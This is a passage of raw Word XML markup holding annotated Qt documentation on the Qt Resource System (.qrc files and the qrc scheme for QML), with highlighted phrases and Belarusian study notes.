            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlContext</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002863E6" w:rsidRPr="002863E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002863E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="002863E6" w:rsidRPr="002863E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId386" w:history="1">
        <w:r w:rsidRPr="002863E6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlComponent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as well as details on including QML files through</w:t>
      </w:r>
      <w:r w:rsidR="002863E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId387" w:history="1">
        <w:r w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt's Resource system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00690F6E" w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Лепей потым зразумець, пра што тут вядзецца гаворка?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="002863E6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="483" w:name="managing-resource-files-with-the-qt-reso"/>
      <w:bookmarkStart w:id="484" w:name="_Toc483000634"/>
      <w:bookmarkStart w:id="485" w:name="_Toc483003651"/>
      <w:bookmarkStart w:id="486" w:name="_Toc483603987"/>
      <w:bookmarkStart w:id="487" w:name="_Toc483605207"/>
      <w:bookmarkEnd w:id="483"/>
      <w:r w:rsidRPr="002863E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Managing Resource Files with the Qt Resource System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="484"/>
      <w:bookmarkEnd w:id="485"/>
      <w:bookmarkEnd w:id="486"/>
      <w:bookmarkEnd w:id="487"/>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The</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId388" w:history="1">
        <w:r w:rsidRPr="00690F6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt resource system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resource files to be stored as binary files in an application executable</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00E17A98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>useful when building a mixed QML/C++ application as it enables QML files (as well as other resources such as images and sound files) to be referred to through the resource system URI scheme rather than relative or absolute paths to filesystem resources.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002863E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, however, that if you use the resource system, the application executable </w:t>
      </w:r>
      <w:r w:rsidRPr="002863E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be re</w:t>
      </w:r>
      <w:r w:rsidRPr="00E17A98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-compiled</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> whenever a QML source file is changed in order to update the resources in the package.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To use the resource system in a mixed QML/C++ application</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create a</w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.qrc</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId389" w:history="1">
        <w:r w:rsidRPr="008D55B3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>resource collection file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that lists resource files in </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XML format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">From C++, </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>load the main QML file as</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a resource using the</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prefix or as a URL with the</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qrc</w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scheme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="008D55B3" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Once this is done, all files specified by relative paths in QML will be </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loaded from the resource system instead</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Use of the resource system is </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pletely transparent to the QML layer</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this means all QML code should refer to resource files using relative paths and should</w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use the</w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qrc</w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scheme</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This scheme should only be used from C++ code for referring to resource files</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D55B3" w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="008D55B3" w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>важныя заўвагі па выкарыстанні сістэмы рэсурсаў</w:t>
      </w:r>
      <w:r w:rsidR="008D55B3" w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>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Here is a application packaged using the</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId390" w:history="1">
        <w:r w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt resource system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The directory structure looks like this:</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project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example</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qrc</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main</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qml</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images</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background</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png</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main</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cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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project</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pro</w:t>
      </w:r>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The</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main.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
